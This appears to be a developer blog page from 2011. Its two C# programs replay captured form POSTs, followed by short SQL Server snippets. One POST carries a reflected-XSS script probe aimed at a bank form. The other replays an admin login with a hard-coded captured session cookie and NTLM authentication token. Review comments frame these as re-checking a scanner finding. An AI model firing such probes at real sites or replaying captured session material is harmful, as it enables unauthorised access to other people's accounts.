Variant 1 (using HttpWebRequest)
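// Replays one captured form POST so that a reported finding can be re-checked by hand.
// The perioadahousing field carries a URL-encoded <script> probe, which looks like the
// output of an automated scanner testing for reflected XSS. If that value comes back
// unencoded in the printed response, the server-side handler needs output encoding and
// input validation for that field.
// NOTE(review): the target is a plain-http internal address; run this only against a
// test instance and with dummy form data.
WebRequest request = WebRequest.Create("http://10.54.40.2/New/cator/_en.php");
request.Method = "POST";
request.ContentType = "application/x-www-form-urlencoded";

// NOTE(review): the hyphens in the telefon value appear to be non-ASCII characters
// (probably altered when the snippet was pasted). They are sent as raw UTF-8 bytes, not
// percent-encoded, which is why ContentLength is taken from the byte array and not from
// the string length.
string postData = "caazaRata=&email=sample@email.tst&formCNP=&formNume=&formOras=&judet=&perioada4all=&perioadaallin1=&perioadaauto=&perioadacard=&perioadadepozit=&perioadahousing=1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e&perioadaopen=&perioadatrip=&produsSolicitat=housing1&sel2=%23&submit=Apply%20online&sumaSolicitata=&sursaLead=www.alphabank.ro&telefon=555‐666‐0606&tipFormular=&valutaCreditDorita=EUR&venitCodebitor=94102&venitSolicitant=";
byte[] byteArray = Encoding.UTF8.GetBytes(postData);
request.ContentLength = byteArray.Length;

// The using blocks release the request stream, the response and the reader even when a
// call throws; the original closed them only on the success path.
using (Stream requestStream = request.GetRequestStream())
{
    requestStream.Write(byteArray, 0, byteArray.Length);
}

// GetResponse throws WebException for 4xx/5xx replies, for example when a filter in
// front of the application rejects the request.
using (WebResponse response = request.GetResponse())
{
    Console.WriteLine(((HttpWebResponse)response).StatusDescription);

    using (Stream responseStream = response.GetResponseStream())
    using (StreamReader reader = new StreamReader(responseStream))
    {
        string responseFromServer = reader.ReadToEnd();
        Console.WriteLine(responseFromServer);
    }
}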
Variant 2 (using sockets)
using System;
using System.Text;
using System.Net;
using System.Net.Sockets;
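namespace sqlInjection
{
    /// <summary>
    /// Replays one captured login POST over a raw TCP socket and prints the first chunk of
    /// the server's reply.
    /// </summary>
    class Program
    {
        private const string TargetHost = "www.site.eu";
        private const int TargetPort = 80;

        /// <summary>
        /// Resolves the target host, sends the request built by <see cref="getRequest"/> and
        /// writes whatever arrives in the first receive call to the console.
        /// </summary>
        /// <param name="args">Unused.</param>
        static void Main(string[] args)
        {
            // Dns.Resolve is obsolete. GetHostAddresses may also return IPv6 entries, so pick
            // an IPv4 address explicitly to match the InterNetwork socket created below.
            IPAddress[] addresses = Dns.GetHostAddresses(TargetHost);
            IPAddress ipv4 = Array.Find(addresses, a => a.AddressFamily == AddressFamily.InterNetwork);
            if (ipv4 == null)
            {
                Console.Error.WriteLine("No IPv4 address found for " + TargetHost);
                return;
            }

            // Build the request once; the original called getRequest() twice for one send.
            byte[] payload = Encoding.ASCII.GetBytes(getRequest());

            // The using block closes the socket even if Connect/Send/Receive throws.
            using (Socket sock = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp))
            {
                sock.Connect(new IPEndPoint(ipv4, TargetPort));
                sock.Send(payload, 0, payload.Length, SocketFlags.None);

                // A single Receive returns only what has arrived so far (at most 10000 bytes).
                // It is not looped because the request asks for keep-alive, so the server may
                // hold the connection open.
                byte[] data = new byte[10000];
                int recvn = sock.Receive(data, SocketFlags.None);

                // NOTE(review): the request advertises gzip/deflate, so a compressed body will
                // not be readable as ASCII text here; the status line and headers still are.
                string response = Encoding.ASCII.GetString(data, 0, recvn);
                Console.WriteLine(response);
            }

            Console.ReadKey();
        }

        /// <summary>
        /// Builds the raw HTTP/1.1 request text: request line, headers, a blank line, then the
        /// form-encoded body.
        /// </summary>
        /// <returns>The complete request, with CRLF line endings and a computed Content-Length.</returns>
        public static string getRequest()
        {
            // HTTP header lines end in CRLF and the header section ends with an empty line.
            // The original used bare LF, left the Proxy-Authorization line unterminated (so
            // Content-Type was glued onto it) and had no blank line before the body.
            const string Crlf = "\r\n";

            // NOTE(review): __VIEWSTATE and __EVENTVALIDATION are captured values; the server
            // may reject a replay once they no longer match the page it issued.
            string body = "__VIEWSTATE=%2FwEPDwULLTExNTc2NTI3OTlkZOHaEH4pHAccC%2BD8297GzVyUUFRz&__EVENTVALIDATION=%2FwEWBALW1uKwCQKl1bKzCQK1qbSRCwKC3IeGDACVXRoyFUUhBYEfdeF4vyGueYuJ&txtUserName=parola&txtPassword=tdsfsd&btnLogin=Login";

            StringBuilder request = new StringBuilder();
            request.Append("POST http://www.site.eu/folder/admin/login.aspx HTTP/1.1").Append(Crlf);
            request.Append("Host: www.site.eu").Append(Crlf);
            request.Append("User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1").Append(Crlf);
            request.Append("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8").Append(Crlf);
            request.Append("Accept-Language: en-us,en;q=0.5").Append(Crlf);
            request.Append("Accept-Encoding: gzip, deflate").Append(Crlf);
            request.Append("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7").Append(Crlf);
            request.Append("Keep-Alive: 115").Append(Crlf);
            request.Append("Proxy-Connection: keep-alive").Append(Crlf);
            request.Append("Referer: http://www.site.eu/Content/admin/login.aspx").Append(Crlf);

            // NOTE(review): the Cookie and Proxy-Authorization values below are captured
            // authentication material (a session id and an NTLM Negotiate message, which
            // carries account identity fields). They do not belong in source or in a
            // published snippet: treat them as disclosed, expire the session, and load such
            // values from local configuration. The proxy header is also being sent straight
            // to the origin server, which has no need to see it.
            request.Append("Cookie: trafic_h=02e52l03442d53c6fa09dfbd0171da9a*1297238801*site.eu*1299572237*1300086189*7; __utma=22993581.1366485220.1297952060.1306749931.1307709074.13; __utmz=22993581.1307709074.13.9.utmcsr=id-utmccn=(referral)|utmcmd=referral|utmcct=/; ASP.NET_SessionId=g4qmn155wzpp1345ejs5r345; __utmb=22993581.3.10.1307709074; __utmc=22993581").Append(Crlf);
            request.Append("Proxy-Authorization: Negotiate TlRMTVNTUAADAAAAGAAYAIIAAAAYABgAmgAAABIAEgBIAAAAEgASAFoAAAAWABYAbAAAAAAAAACyAAAABYKIogUBKAoAAAAPYQBsAHAAaABhAGIAYQBuAGsAaQBtAGkAcgBvAG4AaQBjAGEASABRAC0ATQBJAFIATwBOAEkAQwBBAK4sYYgfYm2HAAAAAAAAAAAAAAAAAAAAAFxJARrW7WqFfvMxrIO/lS7aTQDP900t0g==").Append(Crlf);

            request.Append("Content-Type: application/x-www-form-urlencoded").Append(Crlf);
            // Computed from the body so the header cannot drift from the payload the way the
            // hard-coded 206 could.
            request.Append("Content-Length: ").Append(Encoding.ASCII.GetByteCount(body)).Append(Crlf);
            request.Append(Crlf);
            request.Append(body);
            return request.ToString();
        }
    }
}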
Friday, June 10, 2011
Friday, June 3, 2011
Get modified stored procedures and tables in sql server
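-- Lists stored procedures (P), user tables (U) and views (V) in the current database,
-- most recently modified first.
-- modify_date is set by ALTER (for tables and views, also by index changes). It shows
-- when an object changed, not who changed it, so it helps spot unexpected schema
-- changes but is not a substitute for DDL auditing.
SELECT name, type_desc, *
FROM sys.objects
WHERE type IN ('P', 'U', 'V')
ORDER BY modify_date DESC;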
Thursday, June 2, 2011
sql server - view user roles
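-- Lists every database role together with each principal that is a direct member of it,
-- for the current database only. Nested membership (a role inside a role) appears as
-- its own row and is not expanded.
-- The columns are aliased because both come from sys.database_principals and would
-- otherwise both be called "name"; lower-case column names also work under a
-- case-sensitive collation.
SELECT p.name AS role_name,
       m.name AS member_name
FROM sys.database_role_members AS rm
JOIN sys.database_principals AS p
    ON rm.role_principal_id = p.principal_id
JOIN sys.database_principals AS m
    ON rm.member_principal_id = m.principal_id
ORDER BY role_name, member_name;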
Execute as on sql server
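-- Skeleton of a procedure that runs under a fixed security context.
-- WITH EXECUTE AS 'dbo' makes the body run with dbo's permissions, not the caller's.
-- Anyone granted EXECUTE on the procedure therefore gets dbo-level access to whatever
-- the body touches. Keep the body narrow, do not build dynamic SQL from parameters, and
-- grant EXECUTE only to the roles that need it. Where possible, run as a dedicated
-- low-privilege user instead of dbo.
CREATE PROCEDURE dbo.Test
    @var int            -- declared but not used by the sample body
WITH EXECUTE AS 'dbo'
AS
    SELECT * FROM dbo.SampleTable;   -- placeholder table name; the original used the reserved word TABLE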